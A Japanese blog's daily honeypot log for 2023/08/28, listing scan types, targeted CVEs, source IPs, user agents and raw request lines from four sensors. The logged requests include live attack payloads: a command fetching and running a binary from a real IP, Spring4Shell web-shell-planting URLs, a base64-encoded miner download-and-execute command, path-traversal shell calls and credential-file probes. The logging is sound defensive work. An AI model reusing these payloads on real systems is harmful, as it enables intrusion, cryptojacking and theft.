コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/08/28 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/08/28分です。

特徴
共通

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

curlによるスキャン行為
/.gitへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  81.161.229.185/jaws;
sh /tmp/jaws
Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
zgrabによるスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:110 (前日比:10)
US:総アクセス数:299 (前日比:213)
UK:総アクセス数:125 (前日比:38)
SG:総アクセス数:110 (前日比:-12)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.207.248.41 United States
2 20.223.149.71 United States
15 43.154.141.71 Singapore
30 43.163.241.244 China
2 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.181.94 United States
1 51.159.214.49 France
12 54.160.163.153 United States
1 54.202.114.214 United States
1 74.82.47.5 United States
1 92.118.39.83 Romania
1 104.168.96.242 United States
2 104.192.0.50 United States
8 135.125.217.54 France
2 135.125.246.110 France
5 135.125.246.189 France
1 157.0.133.66 China
1 167.94.146.60 United States
1 172.104.11.46 United States
1 185.170.144.3 Estonia
6 185.207.250.115 Germany
5 185.254.196.173 Ukraine
6 185.254.196.186 Ukraine
1 192.241.236.73 United States
1 198.235.24.8 United States
1 198.235.24.125 United States

UserAgent一覧

件数 UserAgent
20 'Mozilla/5.0
17 -
6 Custom-HttpClient
2 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
15 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla_33741328
1 Python-urllib/3.10
2 Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31
1 curl/7.81.0
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x03
13 \x16\x03\x01
1 \xedeq\xc2\x01\x01
29 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /8.bin HTTP/1.1
1 GET /99vt HTTP/1.1
1 GET /99vu HTTP/1.1
1 GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
1 GET /Display/chan/IB61I7MYA HTTP/1.1
1 GET /Gmail/UnityPlayer.txt HTTP/1.1
1 GET /UnityPlayer.dll HTTP/1.1
2 GET /Visu/ens/events HTTP/1.1
1 GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1
2 GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php HTTP/1.1
1 GET /eDBq HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /functionRouter/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
2 GET /fw6I HTTP/1.1
1 GET /gate.php HTTP/1.1
1 GET /hrsgdsb7386wknzms.jpg HTTP/1.1
2 GET /is-bin HTTP/1.1
2 GET /jquery-3.3.1.min.js HTTP/1.1
1 GET /jquery.js HTTP/1.1
1 GET /le5V HTTP/1.1
1 GET /load HTTP/1.1
1 GET /login HTTP/1.1
1 GET /new/login HTTP/1.1
1 GET /news.php HTTP/1.1
1 GET /qd.CHM HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 81.161.229.185/jaws;sh+/tmp/jaws
1 GET /systembc/password.php HTTP/1.0
1 GET /tomcatwar.jsp?pwd=j&cmd=echo+cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht+%7c+base64+-d+%7c+sh HTTP/1.1
1 GET /ttd.exe HTTP/1.1
2 GET /v3/time HTTP/1.1
1 GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1
1 GET /wh/glass.php HTTP/1.1
1 GET /zMLUH93A HTTP/1.1
15 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
1 POST /functionRouter HTTP/1.1
1 POST /nation.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
71 20.80.27.32 United States
1 20.215.65.71 United States
3 41.216.188.83 South Africa
2 45.79.172.21 United States
8 51.79.29.48 Canada
2 51.89.199.117 France
15 54.37.79.75 France
1 65.49.20.66 United States
3 66.175.213.4 United States
2 83.97.73.87 Germany
1 84.54.51.12 Bulgaria
1 84.54.51.146 Bulgaria
24 94.156.253.14 Bulgaria
1 102.88.34.210 Nigeria
1 103.178.228.36 Vietnam
1 104.236.128.13 United States
2 109.237.98.226 Russia
4 111.42.95.134 China
1 143.198.162.135 United States
2 162.142.125.226 United States
2 167.248.133.126 United States
1 172.104.11.4 United States
1 172.104.11.46 United States
1 172.105.128.12 United States
2 172.105.128.13 United States
1 179.43.163.134 Panama
1 179.43.191.194 Panama
2 184.105.139.70 United States
4 185.100.53.56 Uzbekistan
4 185.207.250.115 Germany
1 192.155.90.118 United States
1 192.155.90.220 United States
1 194.165.16.73 Panama
1 195.74.93.150 United Kingdom
1 198.235.24.146 United States
1 198.235.24.247 United States
127 200.41.191.124 Argentina
1 205.210.31.132 United States

UserAgent一覧

件数 UserAgent
26 -
6 Custom-AsyncHttpClient
4 Custom-HttpClient
2 Go-http-client/1.1
1 Mozila/5.0
73 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
127 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
25 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
24 python-requests/2.28.2
1 python-requests/2.31.0
1 xxx

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
16 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
1 GET /.env.save HTTP/1.1
31 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
1 GET /.travis.yml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /?pp=env HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /__phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
3 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /admin/pma/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
2 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/parameters.yml HTTP/1.1
1 GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /application/configs/application.ini HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /cms/.env HTTP/1.1
2 GET /config.json HTTP/1.1
1 GET /config.py HTTP/1.1
1 GET /config/.travis.yml HTTP/1.1
1 GET /config/?pp=env HTTP/1.1
1 GET /config/app/config/parameters.yml HTTP/1.1
1 GET /config/app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1
1 GET /config/application/configs/application.ini HTTP/1.1
1 GET /config/config.json HTTP/1.1
1 GET /config/config.py HTTP/1.1
1 GET /config/configs/application.ini HTTP/1.1
1 GET /config/constants.js HTTP/1.1
1 GET /config/docker-compose.yml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /config/karma.conf.js HTTP/1.1
1 GET /config/sendgrid.env HTTP/1.1
1 GET /configs/application.ini HTTP/1.1
1 GET /constants.js HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
2 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
4 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker-compose.yml HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
2 GET /index.php?lang=en HTTP/1.1
2 GET /index.php?s=/index/ hink
1 GET /info.php HTTP/1.1
1 GET /karma.conf.js HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local/.env HTTP/1.1
3 GET /mysql-admin/index.php?lang=en HTTP/1.1
3 GET /mysql/admin/index.php?lang=en HTTP/1.1
3 GET /mysql/pMA/index.php?lang=en HTTP/1.1
2 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin-4.9.10-all-languages/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.3.0-all-languages/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.3.0/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2022/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
2 GET /pma/index.php?lang=en HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /script/.env HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sources/.env HTTP/1.1
3 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
3 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
3 GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
2 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
3 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /tomcatwar.jsp?pwd=j&cmd=echo+cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht+%7c+base64+-d+%7c+sh HTTP/1.1
1 GET /wp-content/ HTTP/1.1
2 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 POST /.env.development HTTP/1.1
1 POST /.env.dist HTTP/1.1
1 POST /.env.old HTTP/1.1
1 POST /.env.prod HTTP/1.1
1 POST /.env.production HTTP/1.1
1 POST /.env.project HTTP/1.1
1 POST /.env.save HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
1 POST /admin-app/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /api/v0/id HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /application/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /back/.env HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
2 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /cms/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /cp/.env HTTP/1.1
1 POST /development/.env HTTP/1.1
1 POST /docker/.env HTTP/1.1
1 POST /enviroments/.env.production HTTP/1.1
1 POST /enviroments/.env HTTP/1.1
1 POST /fedex/.env HTTP/1.1
1 POST /functionRouter HTTP/1.1
2 POST /index.php?action=continue&c=blocked HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /live_env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /login HTTP/1.1
1 POST /private/.env HTTP/1.1
1 POST /rest/.env HTTP/1.1
1 POST /script/.env HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /sources/.env HTTP/1.1
1 POST /system/.env HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.206.213 Russia
30 43.134.224.218 Singapore
1 45.33.80.243 United States
1 45.79.172.21 United States
1 45.79.181.179 United States
1 46.105.37.17 France
19 51.79.29.48 Canada
1 51.158.37.186 France
1 64.62.197.121 United States
2 83.97.73.87 Germany
1 84.54.51.12 Bulgaria
3 103.178.228.36 Vietnam
22 109.74.204.123 United States
2 109.237.98.226 Russia
4 113.200.114.43 China
1 138.68.80.252 United States
1 140.238.69.139 United States
2 146.190.111.14 United States
2 157.230.99.127 United States
2 162.142.125.214 United States
4 164.52.49.117 China
2 167.94.145.58 United States
1 167.99.129.80 United States
3 172.104.11.4 United States
2 172.104.11.34 United States
1 172.104.11.51 United States
1 172.105.128.13 United States
1 179.43.191.194 Panama
2 185.207.250.115 Germany
1 191.101.126.31 Germany
1 192.99.9.171 Canada
2 192.155.90.118 United States
1 194.165.16.10 Panama
1 198.199.112.92 United States
1 198.235.24.140 United States
1 198.235.24.236 United States
2 216.218.206.66 United States

UserAgent一覧

件数 UserAgent
20 'Mozilla/5.0
32 -
3 Custom-AsyncHttpClient
2 Custom-HttpClient
4 FooBarTest
4 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0
1 Mozilla_33741328
2 Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31
16 curl/7.54.0
1 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 MGLNDD_132.145.66.34_80\n
1 SSH-2.0-libssh2_1.10.0
1 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\x07\x01
5 \x16\x03\x01\x02
17 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
22 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /1gkY HTTP/1.1
1 GET /8.bin HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /Display/chan/IB61I7MYA HTTP/1.1
1 GET /DjEi HTTP/1.1
1 GET /Gmail/UnityPlayer.txt HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /UnityPlayer.dll HTTP/1.1
2 GET /Visu/ens/events HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
1 GET /e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /functionRouter/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
2 GET /fw6I HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hrsgdsb7386wknzms.jpg HTTP/1.1
1 GET /index.php?s=/index/ hink
2 GET /is-bin HTTP/1.1
2 GET /jquery-3.3.1.min.js HTTP/1.1
1 GET /jquery.js HTTP/1.1
1 GET /load HTTP/1.1
1 GET /login HTTP/1.1
1 GET /nAUX HTTP/1.1
1 GET /new/login HTTP/1.1
1 GET /news.php HTTP/1.1
1 GET /nmaplowercheck1693139363 HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /qd.CHM HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /ttd.exe HTTP/1.1
1 GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1
1 GET /wh/glass.php HTTP/1.1
1 GET /zMLUH93A HTTP/1.1
4 GET http[:]//test[.]getproxylist[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /index.php?action=continue&c=blocked HTTP/1.1
1 POST /nation.php HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
